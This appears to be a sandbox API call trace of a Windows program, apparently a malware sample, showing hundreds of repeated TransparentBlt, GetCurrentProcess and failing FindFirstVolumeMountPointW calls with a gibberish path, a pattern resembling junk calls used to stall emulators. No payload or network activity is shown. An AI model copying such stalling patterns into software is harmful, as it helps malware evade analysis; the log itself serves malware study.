[0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.508] GetCurrentProcess () returned 0xffffffff [0036.508] TransparentBlt () returned 0x0 [0036.509] GetCurrentProcess () returned 0xffffffff [0036.509] TransparentBlt () returned 0x0 [0036.509] GetCurrentProcess () returned 0xffffffff [0036.509] TransparentBlt () returned 0x0 [0036.509] GetCurrentProcess () returned 0xffffffff [0036.509] TransparentBlt () returned 0x0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.559] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.559] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.560] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.560] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.561] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.561] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.562] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.562] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.563] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.563] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.564] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.564] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 